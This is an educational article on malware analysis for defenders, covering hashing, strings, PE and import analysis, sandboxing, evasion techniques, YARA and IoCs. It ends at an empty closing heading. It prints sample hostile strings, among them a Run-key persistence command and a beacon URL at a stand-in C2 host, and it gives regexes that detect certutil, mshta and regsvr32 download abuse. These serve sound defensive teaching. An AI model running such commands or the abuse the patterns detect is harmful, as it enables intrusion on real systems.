Your EDR flagged a file. Or your email gateway quarantined an attachment. Or someone in accounting said “I clicked the thing and now my computer is acting weird.” You’ve got a suspicious binary and a decision to make: is this a known commodity threat you can look up in a database and move on, or is it something new, custom, targeted at your organization specifically? The answer determines whether you spend five minutes or five days on it. Malware analysis is the discipline of taking a hostile program apart to understand what it does, how it does it, who might have written it, and what you need to do about it. It ranges from a quick hash lookup to weeks of reverse engineering, and knowing when to apply which level of analysis is itself a skill.

The TLDR

Malware analysis is the process of examining malicious software to understand its behavior, capabilities, origin, and impact. It operates on a spectrum from basic (automated hash lookups and string extraction) to advanced (manual reverse engineering in a disassembler). Static analysis examines the malware without executing it — looking at the code, metadata, and structure. Dynamic analysis runs it in a controlled environment and watches what it does. Each approach reveals different things. Static tells you what the malware can do. Dynamic tells you what it actually does in a given environment. Together, they give you the indicators of compromise (IoCs) and behavioral signatures you need to detect, contain, and eradicate the threat — and to write detections that catch the next variant.

The Reality

Most security teams don’t do deep malware analysis. They don’t need to for every sample. The vast majority of malware encountered in the wild is commodity — known families with known behaviors that have been analyzed thousands of times. Your EDR vendor’s threat intelligence team already did the work. Look up the hash on VirusTotal, confirm the classification, follow the established response playbook, and move on. That’s the right call 90% of the time.

The other 10% is where it matters. A targeted attack using custom malware won’t match any existing signature. VirusTotal may show zero detections, or have no record of the hash at all, and signature-based detection won’t fire because nobody has seen the sample before. That’s when you need the capability, or a partner who has it, to take the sample apart and figure out what you’re dealing with.

The stakes are concrete. Without analysis, you don’t know what the malware does, which means you don’t know the full scope of compromise. Did it exfiltrate data? Did it establish persistence? Did it move laterally? Did it deploy additional payloads? You can wipe and rebuild the affected system, but if you don’t understand the malware’s capabilities, you don’t know if wiping one system is sufficient or if the entire domain is compromised.

MITRE ATT&CK maps malware capabilities to adversary techniques. When your analysis reveals that a sample performs credential dumping (T1003), establishes persistence via scheduled tasks (T1053), and communicates via HTTPS to a hardcoded C2 server (T1071.001), you can map those to ATT&CK and immediately scope the investigation: what other systems show evidence of these techniques?
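As a rough sketch of that scoping step, the mapping can be kept as a small lookup table. The technique IDs are the three named above; the behavior labels and hunt hints are hypothetical wording chosen for illustration, not an official ATT&CK data format.

```python
# Technique IDs come from the paragraph above. The behaviour labels and
# hunt hints are hypothetical, chosen only for this illustration.
ATTACK_MAP = {
    "credential_dumping": ("T1003", "LSASS access, SAM or NTDS.dit reads"),
    "scheduled_task_persistence": ("T1053", "new or modified scheduled tasks"),
    "https_c2": ("T1071.001", "outbound HTTPS to the hardcoded C2 host"),
}

def scoping_checklist(observed):
    """Return (technique_id, what_to_hunt_for) for each recognised behaviour."""
    return [ATTACK_MAP[b] for b in observed if b in ATTACK_MAP]

for technique, hunt in scoping_checklist(["credential_dumping", "https_c2"]):
    print(f"{technique}: hunt for {hunt}")
```

Each entry becomes a question to ask of every other system in the environment, which is the point of mapping in the first place.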

How It Works

The Analysis Spectrum

Malware analysis isn’t one activity — it’s a spectrum of depth, and you choose the level based on what you need to know and how much time you have.

Level 1 — Automated/Hash-Based. Compute the file hash (MD5, SHA-256) and look it up. VirusTotal aggregates scan results from 70+ antivirus engines. MalwareBazaar (run by abuse.ch) and CISA’s Automated Indicator Sharing (AIS) provide additional context. If the hash is known, you get the malware family, known capabilities, IoCs, and often detailed analysis reports. Five minutes, done. But if the hash is unknown, as it usually will be for targeted malware, you need to go deeper.
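A minimal sketch of the Level 1 step, assuming a lookup by hash rather than an upload of the sample. The endpoint path and the x-apikey header follow VirusTotal’s public API v3 as commonly documented; verify both against the current documentation. The function names are made up for this example, and the request is only built, never sent.

```python
import hashlib
import urllib.request

# Assumed endpoint shape for a hash lookup (VirusTotal API v3).
VT_FILES_URL = "https://www.virustotal.com/api/v3/files/{}"

def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large samples need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def build_lookup_request(file_hash, api_key):
    """Build, but do not send, a hash lookup request."""
    return urllib.request.Request(
        VT_FILES_URL.format(file_hash),
        headers={"x-apikey": api_key},
    )
```

Looking up the hash instead of uploading the file matters for targeted samples: an upload makes the binary visible to other subscribers, which can tip off the attacker.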

Level 2 — Basic Static Analysis. Examine the file without running it. Extract strings, check PE headers (for Windows executables), look at imported functions, examine metadata, check for obfuscation. This gives you a preliminary understanding of capabilities without risk of infection. Thirty minutes to a few hours.

Level 3 — Basic Dynamic Analysis. Run the malware in a sandbox and observe its behavior. What processes does it spawn? What files does it create or modify? What registry keys does it touch? What network connections does it make? This shows you what the malware actually does when executed. A few hours.

Level 4 — Advanced Static Analysis (Reverse Engineering). Load the binary into a disassembler or decompiler (IDA Pro, Ghidra, Binary Ninja) and read the code. Understand the logic, identify encryption algorithms, reverse-engineer the C2 protocol, find the configuration data. This is where you learn how the malware works at a fundamental level. Days to weeks, requires specialized skills.

Level 5 — Advanced Dynamic Analysis. Step through the malware in a debugger, defeating anti-analysis protections, unpacking runtime packers, decrypting communication in real-time. Combined with Level 4, this produces the most complete understanding of the sample. Often performed by dedicated malware research teams or intelligence agencies.

Static Analysis Techniques

Static analysis examines the malware at rest — never executing it, never giving it a chance to do its thing.

File hashing. A SHA-256 hash is a practically unique identifier for a file; MD5 still appears in older feeds and tools, but it is no longer collision-resistant and shouldn’t be relied on alone. Hashes are also fragile: change a single byte and the hash changes. Attackers trivially modify their binaries to produce new hashes while preserving functionality. That’s why hashes sit at the bottom of David Bianco’s Pyramid of Pain.
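The fragility is easy to see with a few lines of Python. This sketch uses stand-in bytes rather than a real executable, and the helper name is invented for the example.

```python
import hashlib

def fingerprints(data: bytes) -> dict:
    """Return the MD5 and SHA-256 hex digests of a byte string."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

original = b"MZ" + bytes(64)        # stand-in bytes, not a real executable
patched = original[:-1] + b"\x01"   # same length, last byte changed

a, b = fingerprints(original), fingerprints(patched)
print(a["sha256"])
print(b["sha256"])
print("match:", a["sha256"] == b["sha256"])
```

One changed byte yields two unrelated digests, so a blocklist of hashes only ever catches the exact file that was already seen.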

Strings extraction. The strings command (or FLOSS for obfuscated strings) pulls human-readable text from a binary. You’ll find URLs, file paths, registry keys, error messages, command-and-control domains, and sometimes hardcoded credentials or encryption keys. A sample that contains strings like cmd.exe /c whoami, reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and https://c2server.evil/beacon just told you a lot about itself without ever running.
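What the strings command does can be approximated in a few lines. This is a simplified sketch, not a replacement for strings or FLOSS: it only finds runs of printable ASCII and UTF-16LE characters and does nothing about obfuscated or stack-built strings. The sample bytes are fabricated for the demonstration.

```python
import re

def extract_strings(data: bytes, min_len: int = 4):
    """Return printable ASCII and UTF-16LE strings of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found

# Fabricated sample: one ASCII string and one UTF-16LE string among junk bytes.
sample = (
    b"\x00\x01cmd.exe /c whoami\x00\xff"
    + "https://c2server.evil/beacon".encode("utf-16-le")
    + b"\x00\x00"
)
for s in extract_strings(sample):
    print(s)
```

Checking for UTF-16LE matters on Windows samples, where many API-facing strings are stored as wide characters and would be missed by an ASCII-only pass.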

PE header analysis. Windows Portable Executable headers contain metadata: compilation timestamp, imported libraries (DLLs), exported functions, section names, and flags. A binary that imports VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread from kernel32.dll is probably performing process injection (MITRE T1055). Tools like PE-bear, pestudio, and CFF Explorer make this analysis straightforward.
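To make the header layout concrete, here is a minimal sketch that reads three COFF header fields using only the standard library. It assumes a well-formed image already loaded into memory and skips the optional header, sections, and import table, which the dedicated tools above handle properly.

```python
import struct
from datetime import datetime, timezone

def parse_pe_header(data: bytes) -> dict:
    """Read machine type, section count, and compile time from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew field
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # COFF header starts right after the signature:
    # Machine (2 bytes), NumberOfSections (2 bytes), TimeDateStamp (4 bytes).
    machine, n_sections, timestamp = struct.unpack_from("<HHI", data, pe_offset + 4)
    return {
        "machine": hex(machine),
        "sections": n_sections,
        "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc),
    }
```

Treat the compilation timestamp as a hint rather than evidence: it is just a field in the file, and authors can set it to anything.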

Import table analysis. The functions a binary imports tell you what it’s designed to do. Networking functions (WSAStartup, connect, send) mean network communication. Cryptographic functions (CryptEncrypt, CryptDecrypt) suggest data encryption or ransomware behavior. Keylogging functions (GetAsyncKeyState, SetWindowsHookEx) indicate keylogger capability.
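One way to turn an import list into a first-pass capability summary is sketched below. The function groups are the ones named in this section; the group labels and helper names are invented for the example, and a real triage list would be far longer.

```python
# Function names are the ones discussed in this section; labels are illustrative.
CAPABILITY_HINTS = {
    "network": {"WSAStartup", "connect", "send"},
    "crypto": {"CryptEncrypt", "CryptDecrypt"},
    "keylogging": {"GetAsyncKeyState", "SetWindowsHookEx"},
    "process_injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
}
KNOWN = set().union(*CAPABILITY_HINTS.values())

def normalize(name: str) -> str:
    """Strip the ANSI/wide suffix (A or W) when the base name is one we track."""
    if name[-1:] in ("A", "W") and name[:-1] in KNOWN:
        return name[:-1]
    return name

def capability_hints(imports):
    """Map imported function names to the capability groups they suggest."""
    seen = {normalize(n) for n in imports}
    return {
        cap: sorted(funcs & seen)
        for cap, funcs in CAPABILITY_HINTS.items()
        if funcs & seen
    }

print(capability_hints(["SetWindowsHookExW", "connect", "ExitProcess"]))
```

A hit is a hint, not a verdict: plenty of legitimate software imports networking and crypto functions, and packed samples often import almost nothing and resolve the rest at runtime.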

Entropy analysis. Encrypted or compressed sections have high entropy (close to 8.0 for a byte-level measurement). A PE file where the .text section has entropy of 7.9 is almost certainly packed — the real code is compressed or encrypted and will unpack itself at runtime. High entropy is a red flag that static analysis alone won’t reveal the full picture.
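The byte-level measurement is Shannon entropy over the 256 possible byte values. A minimal sketch, run here on synthetic data rather than a real PE section:

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

print(round(shannon_entropy(b"A" * 4096), 2))        # constant data, lowest possible
print(round(shannon_entropy(os.urandom(4096)), 2))   # random data, close to 8
```

In practice you would compute this per section rather than over the whole file, since a small packed payload can hide inside an otherwise ordinary-looking binary.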

Fuzzy hashing (ssdeep). Unlike cryptographic hashes, fuzzy hashes measure similarity. Two malware variants from the same family — same codebase with minor modifications — will have similar ssdeep hashes even though their SHA-256 hashes are completely different. This lets you link samples to known families even after modifications.
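The idea of similarity surviving small edits can be shown with a toy measure. To be clear about the swap: this is not ssdeep’s algorithm (context-triggered piecewise hashing) and produces no comparable digest. It is a Jaccard similarity over byte n-grams, used here only to show the contrast with a cryptographic hash. The data is synthetic.

```python
import hashlib

def ngrams(data: bytes, n: int = 4) -> set:
    """All overlapping n-byte windows in the data."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}

def similarity(a: bytes, b: bytes, n: int = 4) -> float:
    """Jaccard similarity of byte n-gram sets, from 0.0 to 1.0."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    if not ga and not gb:
        return 1.0
    return len(ga & gb) / len(ga | gb)

# 2 KiB of stand-in data and a copy with 8 bytes changed.
base = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
variant = base[:1000] + b"PATCHED!" + base[1008:]

print("sha256 equal:", hashlib.sha256(base).digest() == hashlib.sha256(variant).digest())
print("similarity:", round(similarity(base, variant), 3))
```

The SHA-256 digests disagree completely while the similarity score stays high, which is the property that lets fuzzy hashing cluster variants of one family.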

Dynamic Analysis Techniques

Dynamic analysis runs the malware and watches what happens. This requires isolation — you never want malware executing on a production network.

Sandbox execution. Automated sandbox platforms — Cuckoo Sandbox (open source), ANY.RUN (interactive), Joe Sandbox (commercial), and Hybrid Analysis (free) — execute malware in instrumented virtual machines and capture everything: process creation, file system changes, registry modifications, network traffic, API calls, and screenshots. The output is a behavioral report that shows exactly what the malware did.

Network analysis. Capture all network traffic the malware generates. What domains does it resolve? What IPs does it contact? What protocol does it use? What data does it send? Tools like Wireshark and tcpdump capture the packets. FakeNet-NG can simulate network services so the malware thinks it’s talking to the real internet while you capture everything locally.

API monitoring. Hook the system APIs and log every call the malware makes. This is the most detailed view of runtime behavior: every file operation, every registry access, every network connection, every process manipulation. API Monitor logs the individual calls, while Process Monitor (Sysinternals) records the resulting file system, registry, and process activity.

Behavioral signatures. After dynamic analysis, you can describe the malware’s behavior in terms that don’t depend on specific hashes or strings. “Creates a scheduled task named ‘SystemUpdater’ that runs a PowerShell command at startup.” A signature built on that behavior keeps matching when the hash and the C2 domain change, as long as the variant keeps the same persistence mechanism.
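A sketch of how that example might be expressed as a check over process-creation events. The event fields (image, command_line) are assumptions; real EDR and logging products name them differently. The check deliberately ignores the task name, since that is the easiest thing for an attacker to change.

```python
import re

def creates_startup_powershell_task(event: dict) -> bool:
    """Flag schtasks.exe creating a task that runs PowerShell at boot or logon.

    The event schema is hypothetical; adapt field names to your telemetry.
    """
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "").lower()
    return (
        image.endswith("schtasks.exe")
        and "/create" in cmd
        and "powershell" in cmd
        and re.search(r"/sc\s+(onstart|onlogon)", cmd) is not None
    )

event = {
    "image": r"C:\Windows\System32\schtasks.exe",
    "command_line": 'schtasks /Create /SC ONSTART /TN SystemUpdater /TR "powershell.exe -enc AAAA"',
}
print(creates_startup_powershell_task(event))
```

Renaming the task or rotating the C2 domain does not change the result, which is what separates this from a hash or string match.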

Anti-Analysis Techniques

Malware authors know about analysis tools and build countermeasures.

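Packing and obfuscation. Compress or encrypt the malware payload so static analysis reveals nothing useful. At runtime, a stub unpacks the real code into memory and executes it. UPX is the best-known packer and among the easiest to undo, since the tool can decompress its own output (upx -d) unless the sample has been tampered with to prevent it. Custom packers can be extremely difficult to defeat.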

VM detection. Check for artifacts that indicate a virtual machine: specific MAC address prefixes (VMware, VirtualBox), registry keys, running processes (vmtoolsd.exe), hardware identifiers. If a VM is detected, the malware exits cleanly or behaves innocently. ATT&CK tracks this as T1497 (Virtualization/Sandbox Evasion).
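From the analyst’s side, the same checks are worth running against your own sandbox image to see what it gives away. A minimal sketch, assuming you have already collected the VM’s MAC addresses and process list by other means; the prefixes listed are well-known default OUIs for VMware and VirtualBox, not an exhaustive set, and the function names are invented for the example.

```python
# Well-known default MAC prefixes (OUIs); not exhaustive.
VM_OUIS = {
    "00:05:69": "VMware",
    "00:0c:29": "VMware",
    "00:1c:14": "VMware",
    "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
}
VM_PROCESSES = {"vmtoolsd.exe"}

def vm_vendor(mac: str):
    """Return the hypervisor vendor implied by a MAC prefix, or None."""
    prefix = mac.lower().replace("-", ":")[:8]
    return VM_OUIS.get(prefix)

def sandbox_giveaways(macs, processes):
    """List artifacts in the analysis VM that evasive malware could key on."""
    findings = [f"{mac} -> {vm_vendor(mac)} MAC prefix" for mac in macs if vm_vendor(mac)]
    findings += [f"{p} is running" for p in processes if p.lower() in VM_PROCESSES]
    return findings

print(sandbox_giveaways(["08:00:27:12:34:56"], ["VMToolsd.exe", "explorer.exe"]))
```

Anything this reports is something to change or hide in the sandbox image before detonating a sample that might be looking for it.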

Timing checks. Measure how long operations take. If a sleep returns sooner than requested (as it does in a sandbox that fast-forwards sleeps), or a short code path takes far longer than it should (as it does under a debugger), assume analysis and abort. Or sleep for extended periods to outlast sandbox timeout limits. If the sandbox only runs for five minutes and the malware sleeps for six, the behavioral report shows nothing.

Environment keying. Only execute the payload if specific conditions are met — a particular hostname, domain membership, installed software, or geographic location. The sample runs benignly in a sandbox but activates its payload only on the intended target. This is increasingly common in targeted attacks.

Anti-debugging. Detect debugger presence via API calls (IsDebuggerPresent), timing anomalies, or hardware breakpoint detection. When a debugger is detected, crash, exit, or execute a decoy code path.

YARA Rules

YARA is the pattern-matching language for malware analysis. YARA rules describe patterns — strings, byte sequences, conditions — that identify malware families, behaviors, or characteristics.

A YARA rule might match on a specific string embedded in a malware family’s code, a particular byte sequence in the encryption routine, or structural characteristics like “PE file with exactly two sections, both with high entropy.” The YARA community rules and Awesome YARA repositories provide thousands of pre-written rules.
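The shape of a rule, named patterns plus a condition over them, can be mirrored in plain Python. This is not YARA syntax and does not use the YARA engine; it is only an illustration of the logic. In YARA itself the condition below would read roughly as uint16(0) == 0x5A4D and 2 of them. The patterns are the example strings from the strings-extraction discussion earlier in this article.

```python
# Named patterns, playing the role of a rule's strings section.
PATTERNS = {
    "$cmd": b"cmd.exe /c whoami",
    "$run_key": b"CurrentVersion\\Run",
    "$c2": b"c2server.evil",
}

def matched_patterns(data: bytes):
    """Names of the patterns that occur anywhere in the data."""
    return [name for name, pattern in PATTERNS.items() if pattern in data]

def rule_matches(data: bytes, minimum: int = 2) -> bool:
    """True for data starting with MZ that contains at least `minimum` patterns."""
    starts_with_mz = data[:2] == b"MZ"
    return starts_with_mz and len(matched_patterns(data)) >= minimum

sample = b"MZ\x90\x00...cmd.exe /c whoami...https://c2server.evil/beacon"
print(matched_patterns(sample), rule_matches(sample))
```

Requiring two of three patterns rather than all of them is a common trade-off: it tolerates a variant that drops one string without matching every file that happens to mention cmd.exe.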

YARA rules are deployed in two ways: retroactive scanning (scan your file stores and endpoints for files matching a rule) and real-time scanning (integrate with email gateways, EDR, and SIEM to flag files matching a rule as they arrive). When your analysis of a new sample produces a YARA rule, deploying that rule immediately extends detection to your entire environment.

Indicators of Compromise (IoCs)

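The operational output of malware analysis is a set of IoCs: observable artifacts that indicate the presence of the malware, such as file hashes, C2 domains and IP addresses, URLs, file paths, registry keys, and scheduled task names.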

IoCs are shared through threat intelligence platforms (MISP, OpenCTI), ISACs, and public feeds like CISA AIS and AlienVault OTX. Sharing IoCs from your analysis helps the entire community detect the same threat.
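Before sharing, indicators usually have to be pulled out of notes or sandbox reports and made safe to paste. A minimal sketch using regular expressions follows; the patterns are deliberately loose (the IPv4 one does not check that octets are at most 255), and the report text, address, and helper names are made up for the example.

```python
import re

IOC_PATTERNS = {
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),  # loose: no octet range check
    "url": re.compile(r"https?://[^\s\"'<>]+"),
}

def extract_iocs(text: str) -> dict:
    """Return de-duplicated, sorted indicators found in free text."""
    return {kind: sorted(set(p.findall(text))) for kind, p in IOC_PATTERNS.items()}

def defang(indicator: str) -> str:
    """Make an indicator non-clickable before putting it in a report."""
    return indicator.replace("http", "hxxp", 1).replace(".", "[.]")

report = (
    "Beacon to https://c2server.evil/beacon from 203.0.113.7, "
    "dropper hash " + "a" * 64
)
iocs = extract_iocs(report)
print(iocs)
print(defang(iocs["url"][0]))
```

Defanging is a courtesy to whoever reads the report: it stops mail clients and chat tools from turning a live C2 URL into a clickable link.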

Malware Families and Classification

Malware isn’t random. It’s organized into families that share code, techniques, and infrastructure. Understanding the family tells you a lot without analyzing every sample from scratch.

Major categories: ransomware (encrypts files for payment), RATs (remote access trojans for persistent control), stealers (credential and data theft), loaders (deliver other malware), wipers (destroy data rather than hold it for ransom), rootkits (kernel-level persistence and hiding), and botnets (coordinated networks of compromised systems).

Attribution — linking malware to specific threat actors — uses code similarities, infrastructure overlap, victimology, and operational patterns. MITRE ATT&CK Groups documents known threat groups and their associated malware families. Attribution is difficult, often uncertain, and sometimes deliberately misleading (false flag operations), but it provides valuable context for understanding the threat.

How It Gets Exploited

Polymorphic and metamorphic malware. Malware that changes its own code with each infection to evade signature-based detection. Polymorphic malware re-encrypts its body with a new key and a mutated decryption stub; metamorphic malware goes further and rewrites its own instructions, substituting and reordering code so the logic is restructured. Each copy has a different hash, different strings, and different byte patterns. Static signatures can’t keep up. This is why behavioral detection matters.

Fileless malware. Code that never writes to disk — it runs entirely in memory, injected into legitimate processes, leveraging PowerShell, WMI, or .NET in-memory execution. No file to hash, no file to scan, no file to submit to a sandbox. Detection requires memory forensics or behavioral monitoring of process execution.

Supply chain implants. Malicious code embedded in legitimate software updates, open-source libraries, or build tools. The binary passes every reputation check because it IS the legitimate software — with a few extra functions added. SolarWinds, Codecov, and the XZ Utils backdoor (CVE-2024-3094) demonstrated this attack vector at scale.

Living-off-the-land binaries. Not traditional malware at all — adversaries chain together legitimate Windows tools (PowerShell, certutil, mshta, regsvr32) to achieve malicious objectives without dropping a malware binary. There’s nothing to analyze because there’s no malware. The attack lives in command-line arguments and execution chains. The LOLBAS project catalogs these techniques.
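Because the evidence is in the command line, detection here looks like pattern matching on process arguments. The sketch below covers three widely documented abuse patterns for tools named above; it is illustrative only, will miss obfuscated invocations, and is no substitute for the LOLBAS catalog. The labels and function name are invented for the example.

```python
import re

# Illustrative patterns only; the LOLBAS project documents many more.
SUSPICIOUS = [
    ("certutil download", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("mshta remote script", re.compile(r"mshta(\.exe)?\b.*https?://", re.I)),
    ("regsvr32 remote scriptlet", re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I)),
]

def flag_command_line(cmd: str):
    """Return labels for every suspicious pattern found in a command line."""
    return [label for label, pattern in SUSPICIOUS if pattern.search(cmd)]

print(flag_command_line("certutil.exe -urlcache -split -f http://example.test/a.exe a.exe"))
print(flag_command_line("notepad.exe report.txt"))
```

The binaries themselves are signed and expected on every Windows host, so the arguments and the parent process are the only places left to look.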

What You Can Do
